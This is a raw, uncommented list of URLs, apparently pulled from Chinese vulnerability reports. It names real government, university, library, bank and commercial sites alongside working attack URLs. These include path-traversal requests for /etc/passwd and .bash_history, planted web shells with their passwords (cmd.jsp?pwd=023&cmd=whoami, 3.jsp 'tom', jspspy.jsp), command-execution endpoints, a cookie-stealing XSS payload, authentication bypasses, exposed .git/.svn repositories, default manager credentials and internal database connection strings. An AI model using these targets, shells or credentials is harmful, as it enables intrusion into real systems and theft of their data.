http://61.185.221.126:8888/ray_stdeclare/prelogin!relogin.action存在命令执行漏洞 http://61.185.221.126:8888/ray_stdeclare/3.jsp密码tom http://61.185.221.126:8888/ray_stdeclare/4.jsp密码tom http://219.242.65.10//BookShow.aspx?SectionId=5f14b425-ab12-4871-a1f3-4996342cdce0&Aid=5554 http://www.hyxlib.com/BookShow.aspx?SectionId=979d4710-1fa8-45d5-97c4-00bc34d75b46&Aid=5617 http://www.jjlib.cn/BookShow.aspx?SectionId=71dbb37b-278e-41f4-835c-71373202c76f&Aid=6185 http://www.nhlib.com.cn/BookShow.aspx?SectionId=98b57414-3dd5-41d2-9f40-4ffe363ffc1f&Aid=5570 http://www.tzlib.cn/BookShow.aspx?SectionId=1303431c-a9ca-403f-afbc-7d5748a490a1&Aid=18648 http://www.mstd.gov.cn/MSTD/province/index.action存在命令执行漏洞 http://www.mstd.gov.cn/MSTD/02.jsp http://www.et315.com http://wb.51hejia.com/.svn/entries http://www.lvse.com/.git/config http://www.ynkmlz.cn/ms/index1.html?notice=%3f%3f%3f+label.swcx.notice+%3f%3f%3f&cal_login_username=yxddly&cal_login_password=400123 http://www.ynkmlz.cn//swcxinfodata/addfile/kmgs/yxddly/addfile/150529/01432871452973029.jsp https://report.ztgame.com/login.html https://report.ztgame.com http://www.guiyan.com/admin_site_manage/Login.aspx http://a.mojichina.com/guessbook/book_re.aspx?action=class&classid=39&getTotal=147&id=1&lpage=1&page=2&sid=-2-0-0-0-480&siteid=1000 http://wms.efeihu.com/Login.aspx http://wooyun.org/bugs/wooyun-2015-0116550/trace/4ca5456cb29a089f537c7e6f2743d40b http://fk.dachuw.com/ http://www.hbtyzx.gov.cn/ http://mp.weicifang.com https://www.jimubox.com/oauth/register http://124.127.41.161:8080/ http://124.127.41.161:8080/oox.asp;.jpg http://wooyun.org/bugs/wooyun-2010-061369 http://www.fqxzfw.com.cn/ http://bs.wzzl.gov.cn:8888/ http://zwfw.bincheng.gov.cn/ http://xzfw.wjq.gov.cn/zwdt/ http://xz.yuanan.gov.cn/web/ http://www.glsc.com.cn/glzq/financing/management/newNetvalue.jsp?fundcode=B40055 http://www.miitbeian.gov.cn/publish/query/indexFirst.action http://www.infosea.com.cn/yonghu.html http://125.223.252.12:8089/opac/jszjl.jsp?wxlx=zwqk&jstj=km&jsc=3 http://210.45.183.219/opac/jszjl.jsp?wxlx=zwqk&jstj=km&jsc=3 http://lib.tongde.com:8089/opac/jszjl.jsp?wxlx=zwqk&jstj=km&jsc=3 http://218.75.178.63:8089/opac/jszjl.jsp?wxlx=zwqk&jstj=km&jsc=3 http://lib.hhhxy.cn:88/opac/jszjl.jsp?wxlx=zwqk&jstj=km&jsc=3 http://222.56.16.81:8089/opac/jszjl.jsp?wxlx=zwqk&jstj=km&jsc=3 http://59.51.114.198:8088/opac/jszjl.jsp?wxlx=zwqk&jstj=km&jsc=3 http://222.247.62.197:8089/opac/jszjl.jsp?wxlx=zwqk&jstj=km&jsc=3 http://221.206.143.42:8088/opac/jszjl.jsp?wxlx=zwqk&jstj=km&jsc=3 http://tsjs.sdwm.cn:8000/opac/jszjl.jsp?wxlx=zwqk&jstj=km&jsc=3 http://weidian.com/user/userinfo/judge.html?umk=438821803&orderid=1186626160竟然可以访问到; http://bx.315.com.cn:8000这个站直接可获取用户的密码Hash,后台可shell,详情请参考 http://www.czrsks.com/newclass.asp?bigid=25 http://share.tataufo.com/ http://ad.189.cn/login.jsp http://115.236.124.4/ IP:10.120.13.200 Port:18822 key:wanghq Password:qwer ip:10.120.83.156/163 port:18822 key:zzx password:qwer password:qwer1234 http://admin.iwo.kazhu365.com/ http://iwocar.kazhu365.com/ http://119.188.6.230:8080/dl/download.do?encoding=GBK&decoding=ISO-8859-1&fileName=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://119.188.6.230:8989/dl/download.do?encoding=GBK&decoding=ISO-8859-1&fileName=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://119.188.6.230:8888/login.do http://119.188.6.230:8888/error.jsp http://bbs.csdn.net/topics/370258545 http://119.188.6.230:8888/ http://**.**.**/ http://king.youzu.com/image/downloadImg?src=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://king.youzu.com/image/downloadAudio?src=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd https://pbank.psbc.com/pweb/GetUserNickNamePre.do?_locale=zh_CN&BankId=9999 http://wooyun.org/bugs/wooyun-2010-082959 http://chc.eup.cn:88/interface/auth.php?&PASSWORD=1&USER_ID= http://122.144.134.79/interface/auth.php?&PASSWORD=1&USER_ID= http://www.ccas.com.cn:8008/interface/auth.php?&PASSWORD=1&USER_ID= http://219.139.134.9:70/interface/auth.php?&PASSWORD=1&USER_ID= http://bjzljz.com/interface/auth.php?&PASSWORD=1&USER_ID= http://114.251.10.35 http://222.73.36.228:80/ http://www.110.com/ask/question-3187559.html http://xingqu.baidu.com/p/3549102984 www.qiulianai.cn www.jrgl.org/qyfccont.php?id=7 jrgl.org/admin就出来了 http://oa.yccas.com/Finance/Invoice_edit.aspx http://**.**.**/Finance/Invoice_edit.aspx 315.com.cn/***tao-7* http://mlhy.wizlong.com/statistics/student?school= http://dbmonitor.yunshanmeicai.com/anemometer/ http://115.182.33.133/houtai/index.php http://beta.yunshanmeicai.com/ http://www.4007123123.com/updatepwd.aspx?mycode=6hjvvukjny7dxvzduqw31puvj&email=邮箱帐号@qq.com http://www.ct96006.cn/96006/manager/login.action存在命令执行 http://wine.jifentao.com/sjyouhui/?i=8C7FFB279D1C45BD9112EE1835B46E60 http://wine.jifentao.com http://www.boqii.com/user/login?referer=http://www.boqii.com/userinfo/# http://www.tianya8.cc/viewnews.php?newsid=152 http://www.jinlianchu.com/issue_getMyIssue.html http://www.ixm.gov.cn http://www.ixm.gov.cn/app/wyyy/201409/t20140902_65176.html http://www.ixm.gov.cn/ids/custom/xiamen/login_xm.jsp?returnUrl=http%3a%2f%2fwww.ixm.gov.cn%2fjisheng%2fSystem%2fCertificate%2fdefault.aspx%3fapplytype%3d1 http://www.ixm.gov.cn/jisheng/System/UpFile/2015Year/5Mouth28Day/67923c8e-36d2-4835-aa77-9f43f10d69b7.asp http://luc.jiangtai.com/Login,进行登陆,里面泄漏1718条客户信息,并有持续泄漏的迹象。 http://www.whcits.com/xieyou.aspx http://ipos.septwolves.com/ http://market.sdo.com/snda_market_0.2/search_apk.php?q=123 http://115.238.28.251:8861/peds/loginAction.do?action=checkuser&source=hc http://jianzhan.b2b.cn http://www.norsencn.com:80/ www.norsencn.com http://www.miit.gov.cn http://mail.miit.gov.cn:8080/index.php site:mail.miit.gov.cn http://mail.miit.gov.cn:8080/login.php?F_authid=emh1amlhamlhQG1paXQuZ292LmNuJjIwMTUtMDItMDEmNTRjNzU0MTdjMTQ3ZTM2YWY1ZTYyZWUzZmNjZDZhNWU= http://private.avazu.cn/.svn/entries http://www.jsjyt.gov.cn/ http://www.gzdpc.gov.cn/ http://www.ahaic.gov.cn/ http://lm.nantong.gov.cn http://www.zjtt.gov.cn inurl:/markbook/GetIndex.jsp http://61.139.105.145/markbook/ http://61.139.105.145/markbook/FAQDisplay.jsp?FID=39 jsp:useBean http://jwc.scnu.edu.cn/qq.asp http://jwc.scnu.edu.cn/burp.aspx http://ddcg.jszfcg.gov.cn/projectLogin.action http://pawn.ecitic.com/indexSearchTwoAction?keyWord=&category=new http://www.myfawu.com/product.php?type= http://www.myfawu.com/other/focus.php?focusID= http://www.myfawu.com/other/focus.php?page=1&focusID= http://www.myfawu.com/news/cat.php?cat1= http://www.myfawu.com/news/cat.php?cat1=&cat2= http://www.myfawu.com/news/cat.php?cat1=&cat2=&cat3= http://www.myfawu.com/news/industry_list.php?industryID= http://www.sdchina.com/special/2012/lianghui/Detail.aspx?ID=2235955 http://tour.sdchina.com/special/2011/hsmtx/list.aspx?stid=2454 http://tour.sdchina.com/sight/city.aspx?cityCode=370100&pageid=3 http://tg.sdchina.com/ajax/AjaxUserSearch.aspx?u=123&callback=jsonp1432881358134&_=1432881366419 www.sdchina.com www.hb.xinhuanet.com www.hn.xinhuanet.com www.gmw.cn http://www.chinadaily.com.cn http://news.china.com.cn/ http://**.**.**/index.do http://media.lib.sjtu.edu.cn/emlib4/format/release/aspx/eml_userwh.aspx http://202.120.143.35/emlib4/format/release/aspx/eml_userwh.aspx http://166.111.120.118/emlib4/format/release/aspx/eml_userwh.aspx http://202.116.197.15/emlib4/format/release/aspx/eml_userwh.aspx http://58.192.97.29/emlib4/format/release/aspx/eml_userwh.aspx http://211.84.163.227/emlib4/format/release/aspx/eml_userwh.aspx http://t2361.sandai.net:8089/oc/@@loginForm.html?camefrom=%2Foc%2F%40%40login%3Fcamefrom%3Dhttp%253A%252F%252Ft2361.sandai.net%253A8089%252Fdefault%252F%2540%2540index.html%26service%3Dhttp%253A%252F%252Ft2361.sandai.net%253A8089%252Fdefault%252F%2540%2540sso http://www.gzdpc.gov.cn/lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23 http://www.ahaic.gov.cn/lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23 http://lm.nantong.gov.cn/lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23 http://www.jsjyt.gov.cn/lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23 http://www.zjtt.gov.cn/lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23 http://land.huizhou.gov.cn/WorkOnLine/loginAction.action http://118114.myzone.cn/ http://hndxrl.myzone.cn/oa/?action=mypassword&type= http://pydx.xt0393.com/OA/?action=mypassword&type= http://ycsfj.myzone.cn/OA/?action=mypassword&type= http://lhrsbx.myzone.cn/OA/?action=mypassword&type= https://passport.haodf.com/user/showlogin http://sso.ecaic.com/auth/user/registerUserAction.action http://sso.ecaic.com/auth/user/registerUserAction.action http://sso.ecaic.com/auth/user/registerUserAction.action http://www.cqfzb.gov.cn http://www.cqfzb.gov.cn/Pro_General/General.aspx?ProID=51 http://www.cqfzb.gov.cn/fzbzgzj/login.aspx http://www.cqfzb.gov.cn/fzbbb/login.aspx http://61.151.239.168/store/show.php?id=110 http://61.151.239.168/store/cjwtlist.php?id=14 https://its.bocmacau.com/prelogin.do?_locale=zh_CN&BankId=9999&LoginType=R http://www.shcdkf.com/kfweb/Article_Class01.aspx?mid1=0002 http://cwch.ahu.edu.cn/querynetweb/Article_Class01.aspx?mid1=0002 http://cycwc.gzife.edu.cn/kefa/Article_Class01.aspx?mid1=0001 http://cw.syu.edu.cn:8080/KfWeb/Article_Class01.aspx?mid1=0001 http://58.16.80.232/kefa/Article_Class01.aspx?mid1=0001 http://221.5.51.228/cjb/Article_Class01.aspx?mid1=0001 http://bbs.jia.com/t_2127337 http://i.jia.com/user/show_info.htm http://i.jia.com/user/mod_addr.htm?id=197910 http://wx.ppmoney.net/weixinmanager/index.jsp http://www.rjggy.com http://shzyq.com/ http://syytrqhg.firstknow.cn http://www.cnpc-ngo.com http://www.formarket.net http://yuyue.mama.cn/index.php?a=Index&cidname=*&cityname=%E5%B9%BF%E5%B7%9E&d=get_shopslist&g=Home http://mail.qyhhua.com/wapmail/index.action http://shop.ecaic.com http://shop.ecaic.com/netSales/pagesCar/SimpleCarEdit.do http://shop.ecaic.com/netSales/pagesCar/SimpleCarEdit.do jar:/opt/jdk1.5.0_22/lib/tools.jar http://i.boqii.com http://www.gobetter.cn/ http://www.webgobetter.com http://122.200.76.196 http://115.28.233.30:7921 http://webgobetter.com http://211.103.201.211 http://www.jzedu.com/jxgz_view.asp?id=443 http://www.jzedu.com/admin http://cz.emyda.com/head/ http://cz.emyda.com/head/admin.php?s=/Public/login/ https://vpn.lppz.com/ http://219.142.76.180/www/jsp/index.jsp http://oa.zotye.com/main/login.jsp http://www.whcits.com http://www.whcits.com//xianlu.aspx?id=04001377155&qu=-1* https://wlan.ct10000.com http://changba.kuwo.cn/kge/config.jsp http://60.28.201.187/l.web http://topmusic.kuwo.cn/today_recommend/xml_new.htm http://topmusic.kuwo.cn/today_recommend/ring_xml.html http://changba.kuwo.cn/kge/admin/ http://60.28.205.41:8280/admin/login.jsp http://60.28.205.41:8280/KuwoEdit/index.jsp http://mcache.oss.letv.com/queue/dump?type=1 TaskCount:4094/4319 FieldName:REPLY Host:115.182.93.91 http://mcache.oss.letv.com/queue/dump?type=1 http://sso.ecaic.com/auth/user/registerUserAction.action http://sso.ecaic.com http://115.182.212.201/.git http://113.106.83.122/ http://113.106.83.122/SISP/Default.aspx https://www.baidu.com/?fenlei=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E http://gsxt.saic.gov.cn/ http://url/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd http://xy.linkong.com/activity/date/rank.php?datestr=20100519&pn=-1 http://www.shouliwang.com/travel/travel.rar http://www.shouliwang.com/travel/shoumanage/Index.aspx www.shouliwang.com/travel/templets/1php/2015-5/1.aspx http://sh.suning.com http://sh.suning.com/life/ajax/memtrans-ajax!checkMemberInfo.action?collectAccount=1865166xxxx http://v.youku.com/v_show/id_XNjk2MTM4OTI4.html http://www.dji.com/cn/fly-safe/category-mc http://card.sicnu.edu.cn/_wx/_wx_home_news.aspx?fid=&kw= http://card.sicnu.edu.cn/_wx/_wx_home_news_ajax.ashx?action=GetHtml&fid=&kw=1 http://iportal.jpush.cn http://iportal.jpush.cn/login/ http://iportal.jpush.cn/devinfo/?devid=69726@ http://www.linekong.com/xml/common.php?num=5&sort_id=97 http://www.bayueshan.com/erp/ http://www.bayueshan.com/index!erp.action ftp://218.78.217.83/ www.shouliwang.com/travel/travel.rar URL:http://tk.100xuexi.com/Member/MyShelf/buy.aspx URL:http://tk.100xuexi.com/Member/MyShelf/download.aspx URL:http://tk.100xuexi.com/Member/MyShelf/favor.aspx http://115.29.204.64:9001/ http://dev.itojoy.com:8080 http://app.cqrcb.com:81/apply/bak.jsp http://xy.linkong.com/activity/love_code/_ajax.html.php?option=*&qid=1011&timeStame=1432905762461n62363&types=1 http://xy.linkong.com/picture.php?page=2&sort_id=* http://xy.linkong.com/xml/bcastr.php?num=5&sort_id=* http://xy.linkong.com/xml/common.php?num=5&sort_id=* http://xy.linkong.com/wallpaper.php?page=2&sort_id=* http://183.62.155.101/BAFC/LEAP/Login/440306/BAFC/Login.html http://wenku.baidu.com/view/938dddccfe4733687f21aa10.html http://www.12321.cn/12321/notice_detail.php?id=33 http://218.20.201.91/pyjf/rygl/register.action存在命令执行漏洞 http://218.20.201.91/pyjf/2.jsp密码tom www.95572.com http://www.95572.com/jsp/grzx/grzx.jsp?ColumnID=57 http://www.jsycjw.gov.cn/oldjjw/admin/update.asp?action=update http://www.jsycjw.gov.cn/oldjjw/admin/update.asp?action=update http://app.ssia.org.cn/login.jsp http://www.sczfcg.com/CmsNewsController.do?bulletinType=06&channelCode=cgygg&index=recommendBulletinList&isAJAX=true&method=recommendBulletinList&page=1&rp=9 http://www.sczfcg.com/SupplierShowController.do?districtId=1&districtLevel=1&isAJAX=true&keyWord=e&method=getSupplierForList&page=1&rp=20 http://www.sczfcg.com/UniqueController.do?method=isUnique http://u.muzhiwan.com/.svn/entries www.ankang06.org(安康家园)隶属北京金宝威教育科技有限公司(www.kidspower.cn) http://www.ankang06.org/.svn/entries http://www.china-seeq.com/questionInves/pilupdf.jsp?url=/home/tomcat/apache-tomcat-6.0.35/conf/server.xml http://localhost:8080/see-core/ws/adminUser?wsdl soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body ns2:queryComPany xmlns:ns2="http://ws.admin.core.see.com/ ns2:adminUserRzComPanyRequest ns2:adminUserRzComPanyRequest ns2:queryComPany soap:Body soap:Envelope http://market.oppo.com:8888/login.do http://wk.100xuexi.com http://link.1905.com/.svn/entries http://2015.jsjds.org/index.php/site/viewText?id=1 http://www.jsjds.org/UserList.asp?OrderType=1&page=1 http://wkjsj.cn/User_GetPassword.asp http://summerintern.chinaamc.com www.dxsch.tsinghua.edu.cn http://219.242.65.10/Booklist.aspx?SectionId=9d38bb1d-d435-4a20-b04a-ef48fdc0fb0c http://drtsg.qzjmc.edu.cn:8084/Booklist.aspx?SectionId=0f68c0b2-e4da-43f6-a062-094348a9622c http://www.jjlib.cn/Booklist.aspx?SectionId=9d38bb1d-d435-4a20-b04a-ef48fdc0fb0c http://www.nhlib.com.cn/Booklist.aspx?SectionId=9d38bb1d-d435-4a20-b04a-ef48fdc0fb0c http://www.tzlib.cn/Booklist.aspx?SectionId=9d38bb1d-d435-4a20-b04a-ef48fdc0fb0c http://try.ellechina.com/upload/sf/sitemap.html http://www.ecaic.com:8070/cardactiverenshen/fileDownLoadAction.do?action=download&fileUrl=/jsp/material/2752/&fileName=lipei.rar http://www.ecaic.com:8070/cardactiverenshen/fileDownLoadAction.do?action=download&fileUrl=/jsp/material/2752/../../../../../../../etc/&fileName=passwd http://www.ecaic.com:8070/cardactiverenshen/fileDownLoadAction.do?action=download&fileUrl=/jsp/material/2752/../../../../&fileName=cardactive.jsr http://www.ecaic.com:8070/cardactiverenshen/fileDownLoadAction.do?action=download&fileUrl=/jsp/material/2752/../../../../../../../root/&fileName=.bash_history http://www.ecaic.com:8070/cardactiverenshen/fileDownLoadAction.do?action=download&fileUrl=/jsp/material/2752/../../../../../&fileName=.bash_history http://61.142.174.200/cwc/KFweb/admin/web_add.aspx?mid1=0005&mid2=0097&type=edit http://cycwc.gzife.edu.cn/kefa/admin/web_add.aspx?mid1=0005&mid2=0097&type=edit http://cw.syu.edu.cn:8080/KfWeb/admin/web_add.aspx?mid1=0005&mid2=0097&type=edit http://58.16.80.232/kefa/admin/web_add.aspx?mid1=0005&mid2=0097&type=edit http://221.5.51.228/cjb/admin/web_add.aspx?mid1=0005&mid2=0097&type=edit http://www.shcdkf.com/kfweb/admin/web_add.aspx?mid1=0005&mid2=0097&type=edit http://www.shouliwang.com/login.html http://www.citshn.net.cn/info.asp?id=3518 http://citshn.net.cn/about.asp?id=6 http://mall.oppo.com/index.php?q=account/addr&aid=3031 http://mall.oppo.com/index.php?q=account/addr&aid=3030 http://cichang.hujiang.com/services/mobileservice2.asmx http://www.msxt.com/caifu/chanpin/show.php?id=449 http://www.601601.com/ http://hx.553.com/index.php?p=1&r=index/audio&t=1 display:none http://oldweb.cqvip.com/Trace.axd http://ir.cqvip.com/Trace.axd http://zlf.cqvip.com/Trace.axd http://suse.ss.cqvip.com/Trace.axd http://cqvip.com/Trace.axd http://test.cqvip.com/Trace.axd http://mju.ss.cqvip.com/Trace.axd http://cstj.cqvip.com/Trace.axd http://ahu.ss.cqvip.com/Trace.axd http://hzu.ss.cqvip.com/Trace.axd http://xjjtedu.ss.cqvip.com/Trace.axd http://xmygz.ss.cqvip.com/Trace.axd http://ccd2.cqvip.com/Trace.axd http://gzmu.ss.cqvip.com/Trace.axd http://auoaf.ss.cqvip.com/Trace.axd http://heuet.ss.cqvip.com/Trace.axd http://zime.ss.cqvip.com/Trace.axd http://exam.cqvip.com/Trace.axd http://lib.cqvip.com/Trace.axd http://qikan.cqvip.com/Trace.axd http://xbmu.ss.cqvip.com/Trace.axd http://ci.cqvip.com/Trace.axd http://hrbcu.ss.cqvip.com/Trace.axd http://lstc.ss.cqvip.com/Trace.axd http://sicnu.ss.cqvip.com/Trace.axd http://info.cqvip.com/Trace.axd http://www.cqvip.com/Trace.axd http://sci.cqvip.com/Trace.axd http://jxsrsp.cqvip.com/Trace.axd http://gxkjdxsrsp.cqvip.com/Trace.axd http://gocheck.cqvip.com/Trace.axd http://scut.ss.cqvip.com/Trace.axd http://qzxu.ss.cqvip.com/Trace.axd http://cdnu.ss.cqvip.com/Trace.axd http://gzhtcm.ss.cqvip.com/Trace.axd http://btedu.ss.cqvip.com/Trace.axd http://swjtu.ss.cqvip.com/Trace.axd http://njtc.ss.cqvip.com/Trace.axd http://git.ss.cqvip.com/Trace.axd http://cmc.ss.cqvip.com/Trace.axd http://fjut.ss.cqvip.com/Trace.axd http://fjau.ss.cqvip.com/Trace.axd http://fzu.ss.cqvip.com/Trace.axd http://labos.com.cn:8000/coreextend/extend/login.action,如图所示: http://sjjx.hytc.edu.cn/jingsai/JingSaiJiaoShi.aspx?JingSaiNo=1 http://open.boc.cn http://www.zjlianhua.com/ http://active.lhgw.com.cn/Public/MembPoints.aspx http://active.lhgw.com.cn/Public/MembPoints.aspx http://active.lhgw.com.cn/Public/MembPoints.aspx http://active.lhgw.com.cn/Public/MembPoints.aspx http://history.nju.edu.cn/index.php http://history.nju.edu.cn/show.php?id=3305&menuid=3 http://history.nju.edu.cn/admin/modify_article.php?id=3305 http://210.47.163.50:8080/zypj-2013/download?filename=../../../../../../../../../../../../etc/passwd http://202.100.78.91:7001/jkda http://202.100.78.91:7001 http://222.134.77.234:8080/Main.jsp?init=8 http://www.jnscp.cn/ http://jw.jltu.net/teacher/add_teacher.asp?name=tanqingmin&key=978233&qx=admin http://jw.jltu.net/main/ http://jw.jltu.net/class/open_sutdent.asp?id=4366 http://jw.jltu.net/class/open_sutdent.asp?id=1 http://jw.jltu.net/class/open_sutdent.asp?id=10000 http://db.health.hsw.cn/hospital/1609.shtml http://wscx.hljszgjj.com/ http://www.77l.com/News/gonglue/39556.html http://www.ceboss.cn/ http://rates.homeinns.com/ImageUpload.aspx http://rates.homeinns.com/Mains.aspx?city=hebi@&hotel=039201 http://218.65.5.117:8008/outportal/getbackpassw/getbackPas.jsp http://120.203.196.20/outportal/getbackpassw/getbackPas.jsp http://xzfw.jxcr.gov.cn/outportal/getbackpassw/getbackPas.jsp http://xzfw.jinxi.gov.cn/outportal/getbackpassw/getbackPas.jsp http://117.40.187.175:8008/outportal/getbackpassw/getbackPas.jsp http://wssp.jiangxi.gov.cn:8008/outportal/getbackpassw/getbackPas.jsp www.wandaplaza.cn http://www.yumi.com/member/forgot http://42.121.112.222:8080/ http://218.195.234.37/oa_server/InfoTeacherSelect.aspx?id=3711135 http://lib.heuet.edu.cn:8080//oa_server/InfoTeacherSelect.aspx?id=3711135 http://vrs.lib.xju.edu.cn/oa_server/InfoTeacherSelect.aspx?id=3711135 http://59.73.148.27:8080/bj_server/InfoTeacherSelect.aspx?id=3711135 http://211.64.123.12/bj_server//InfoTeacherSelect.aspx?id=3711135 www.chinabook.cc www.xhyd.com www.ducool.cn http://www.xhyd.com/.svn/entries http://video.sdo.com http://video.sdo.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://wx.dodonew.com/manager/html http://dhsh.szkuniu.com/uc_server/ www.dczs.net www.dczs.net www.cnautonews.com www.bonshop.cn www.mshedu.cn www.hbhstj.com www.7cd.cn www.mpsj100.com http://ccaa.open.com.cn/logon.aspx http://ccaa.open.com.cn/User/userAdd.aspx?_loginName=test http://ccaa.open.com.cn/User/userAdd.aspx?_loginName=test&_opT=1 http://bbs.iiyi.com/source/plugin/tools/tools.php http://evt.tiancity.com/survey/survey.php?sname=CMH_CLOSURE http://v3.faqrobot.org/user/findById?Id=3330 http://ets-ccaa.open.com.cn/Register.aspx http://go.aliyun.com http://www.renmaituan.com/homePage.action,来到钱隆贷-人脉团的供应链金融的登陆界面, com.suning.mobile.epa/databases/目录下的 http://www.eloancn.com http://z.eloancn.com/ http://z.eloancn.com/projInfoController.do?projinfo&projectid=3f58a6afef0f447f8f9bf6512c69cb34 http://z.eloancn.com/projInfoController.do?projinfo&projectid=3f58a6afef0f447f8f9bf6512c69cb34 http://qq.m.dianping.com/.git/ https://github.com/lijiejie/GitHack http://author.3gsc.com.cn/.svn/entries http://115.182.12.17/gomesplunk/ http://115.182.12.17:80/manager/html user:admin pass:admin http://115.182.12.17/888/ http://115.182.12.17/ak/ http://115.182.12.17/dingfan/ http://115.182.12.17/wooyun/index.jsp http://www.springframework.org/dtd/spring-beans.dtd jdbc:oracle:thin:@115.182.62.217:1521:afodb jdbc:mysql://10.58.46.17:7306/data_assistant?autoReconnect=true&useUnicode=true&characterEncoding=UTF-8&rewriteBatchedStatements=true jdbc:mysql://10.58.47.155:3306/data_assistant?autoReconnect=true&useUnicode=true&characterEncoding=UTF-8 http://61.184.33.201:8888/index.htm http://114.242.111.22/ https://www.ep-link.com/ui/login.jspx https://www.ep-link.com/daozi.jsp https://www.ep-link.com/jspspy.jsp http://thuiyi.docin.com http://open.itcast.cn/ http://open.itcast.cn/php/6-12*.html http://61.191.59.82/ http://photo.hsw.cn:80/Activity/index/catid/24 http://gpswo.hn165.com/ inurl:http://www.chinalife.com.cn/online/propertyPolicy/findRegistDetail.do http://www.chinalife.com.cn/online/propertyPolicy/findRegistDetail.do?mobileOrWY=0&comCode=3110000®istNo=605072014110000024813&policyNo=805072014110108000582 http://www.chinalife.com.cn/online/propertyPolicy/findRegistDetail.do?mobileOrWY=0&comCode=3310000®istNo=605012014310000056916&policyNo=805012014310115003266 http://www.cgdc-sd.com/ inurl:http://realname.xinnet.com/uploadcdn.do?method= http://realname.xinnet.com/uploadcdn.do?method=uploadPic&domainStr=leizhenkm.cn&rad=0.6171259343637968&password=57195bd01a1b85aa12d0ff85599a16b9289d58c54bf5c217 http://realname.xinnet.com/uploadcdn.do?method=uploadPic&domainStr=imuwang.cn&rad=0.3519226693447535&password=57581d76c09605f75d05ae6c21375e152d6d478b08538e20 inurl:KonkaSellUnReport.do?method=list&username= http://qdgl.konka.com/webservice/KonkaSellUnReport.do?method=list&username=%E8%91%A3%E6%9C%9D%E8%BE%89&__username=%E8%91%A3%E6%9C%9D%E8%BE%89&user_id=39375&userpass=0&__password=0 http://qdgl.konka.com/login.do http://www.masstudy.cn/web/index.aspx http://www.qhdzsxx.com/web/index.aspx http://www.whzsjy.cn/web/index.aspx http://www.ycsqjy.com/web/index.aspx http://ylllstudy.com/web/index.aspx http://admin.flyapp.me/login/index http://shop.neusoft.edu.cn/GoodsDetailServlet?used_prod_id=存在注射漏洞,获取 http://www.job5156.com http://1.1.1.1:8000/ http://gj.tempus.cn http://gj.tempus.cn http://envi.ruc.edu.cn/competition/dede/za.php http://envi.ruc.edu.cn/competition/dede/h.php http://kefu.xmbtn.com/is/cmd.jsp?pwd=023&cmd=whoami http://wooyun.org/bugs/wooyun-2010-09259 http://www.foosun.net http://www.jshtgz.com.cn http://www.xfxww.com http://www.luohe.tv http://www.motorchina.com http://www.sxczps.gov.cn gcxy.ynau.edu.cn/Admins/Admin_Main.aspx http://www.fjzhrs.gov.cn/show_gg.asp http://sqlmap.org http://bbc.ztgame.com:8090/ http://www.kflib.cn:8089/opac/index_info.jsp http://scsk.crsp.org.cn:8070/opac/index_info.jsp http://211.86.195.15:8086/opac/index_info.jsp http://scsk.crsp.org.cn:8070/opac/index_info.jsp http://58.133.216.9:8070/opac/index_info.jsp http://www.kflib.cn:8090/opac/index_info.jsp http://58.118.253.4:8070/opac/index_info.jsp http://222.56.16.81:8089/opac/index_info.jsp http://lib.hhhxy.cn:88/opac/index_info.jsp http://59.51.114.198:8088/opac/index_info.jsp http://tsjs.ndjclib.com:8070/opac/index_info.jsp http://scsk.crsp.org.cn:8070/opac/index_info.jsp http://www.jnbank.cc:8000/jnrcb/searchChannel http://58.49.53.10/ http://113.105.64.247 http://api1.tempus.cn http://113.105.64.247/FaxFile/ http://yygl.ikanshu.cn:80/admin/statistic.do?method=datalist&dsId=3 http://www.fanwe.com http://t2.fanwe.net:86/ http://group.tempus.cn/pw/job2/ http://group.tempus.cn/pw/job2/UI/Download/ http://www.bsu.edu.cn/ http://121.13.248.37:8080/yljg/yljg/getYljgListAction.action http://121.13.248.37:8080/yljg/1.txt http://bbs.ipark.cn/.svn/entries http://58.215.43.21:8080/ http://m.chinahr.com/findpassword.html http://mail2.glsc.com.cn:8084/names.nsf?Login http://sd.189.cn/ju/index.action http://bbs.touna.cn/resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml http://d.pigai.org/?act=mid_vs&corpus=bj1&cp0=1 http://hotel.tempus.cn/page_load/login.aspx http://group.tempus.cn/pw/job2/admin/MyLogin.aspx https://vpn.yolo24.com/dana-na/auth/url_default/welcome.cgi?p=failed https://mail.yolo24.com http://business.bnu.edu.cn:8080/seba/login/login.jspa http://business.bnu.edu.cn:8080/seba/1.txt http://group.tempus.cn/pw/job2/UI/company_info_p.aspx?company_id=178 http://simc.creditease.cn/login/login!login.action http://smp.creditease.cn/updatepassword/updatepassword!insert.action http://smp.creditease.cn/search.jsp http://events.csdn.net/ophonequiz/manager/ http://events.csdn.net/qs/exuberance/manager/ http://events.csdn.net/SoftwareSelection2009/manager/ http://events.csdn.net/jazz/manager/ http://events.csdn.net/ophonejd/manager/ http://events.csdn.net/chinacloud/manager/ http://events.csdn.net/CSGS2011/manager/ http://events.csdn.net/tcl/manager/ http://events.csdn.net/IBM/innovate2010/manager/ http://events.csdn.net/SonyEricsson/quiz/manager/ http://events.csdn.net/SAP/crystal/manager/ http://events.csdn.net/IBM/RationalAppScan/manager/ http://rz.hebnews.cn/.svn/entries http://www.sdbcn.net/ http://www.sdbcn.net/Admin_index.asp http://www.sdbcn.net:8080/ http://www.sdbcn.net:8080/is/cmd.jsp?pwd=023&cmd=whoami http://museum.ntua.edu.tw/menu/Main.action google:inurl:companycglist.aspx?ComId=* http://eps.umgg.com.cn/Products/Category_MSelect.aspx?Name=树脂磨盘 